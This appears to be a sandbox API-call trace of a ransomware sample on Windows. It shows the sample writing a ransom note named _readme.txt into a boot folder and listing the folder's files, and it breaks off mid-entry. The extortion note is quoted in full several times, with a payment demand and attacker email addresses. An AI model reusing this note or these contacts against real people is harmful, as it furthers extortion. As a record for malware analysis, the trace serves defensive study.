RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.107] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.108] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.108] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.108] PathFindFileNameW (pszPath="") returned="" [0056.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.108] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.108] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.108] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.108] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.108] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0056.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.108] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0056.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.109] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.109] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.110] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.110] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.110] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.111] CloseHandle (hObject=0x5c8) returned 1 [0056.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.111] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.112] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.112] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.112] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.112] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.112] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.112] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 